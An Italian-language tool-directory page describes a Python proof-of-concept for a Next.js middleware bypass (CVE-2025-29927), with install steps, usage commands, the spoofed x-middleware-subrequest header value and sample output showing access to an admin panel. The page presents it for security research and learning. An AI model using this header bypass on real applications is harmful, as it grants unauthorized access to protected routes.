Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Proof-of-Concept per un bypass fittizio del middleware Next.js (CVE-2025-29927) — crea sotto-richieste per testare le route protette. | Kitploit
Strumenti/GitHubGitHub/m2hcz/poc-for-next.js-middleware
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Proof-of-Concept per un bypass fittizio del middleware Next.js (CVE-2025-29927) — crea sotto-richieste per testare le route protette.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
11 anno faNon ancora revisionato

PoC per il Bypass del Middleware di Next.js (CVE-2025-29927)

Python Version Status

Questa è una proof-of-concept per una vulnerabilità fittizia di bypass del middleware di Next.js (CVE-2025-29927). Utilizzare solo per scopi educativi e ricerche di sicurezza autorizzate.


🚀 Caratteristiche

FunzionalitàDescrizione
✨ Colore e verboseOutput colorato; -v per log di debug dettagliati.
📦 Struttura OOPDesign basato su classi per chiarezza e manutenibilità.
🌐 Supporto ProxyInstradare il traffico tramite proxy HTTP(S) con --proxy.
🍪 Gestione Sessionirequests.Session persistente per cookie e riutilizzo connessioni.
🚦 Controllo RedirectNessun follow-redirect per default; rileva chiaramente pass vs fail.
🛠 Header PersonalizzatiSovrascrivi User-Agent, x-middleware-subrequest, o aggiungi header.

⚡ Installazione

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Richiede Python 3.7+


🎯 Utilizzo

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 Esempi

1. Test Base

root@kitploit:~
python poc.py localhost:3000

2. HTTPS e Percorso Personalizzato

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Proxy e Verbose

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Output Previsto

Successo

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Fallimento

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
Scarica lo strumento
OpzioneDescrizione
-p, --path PATHPercorso della route protetta (default: /admin)
-s, --scheme {http,https}Protocollo (default: http)
--header HEADERValore dell'header x-middleware-subrequest (default: middleware:middleware)
-ua, --user-agent AGENTUser-Agent personalizzato (default: Mozilla/5.0)
--proxy PROXYURL proxy HTTP(S) (es. http://127.0.0.1:8080)
-v, --verboseAbilita output di debug
-h, --helpMostra questo messaggio di aiuto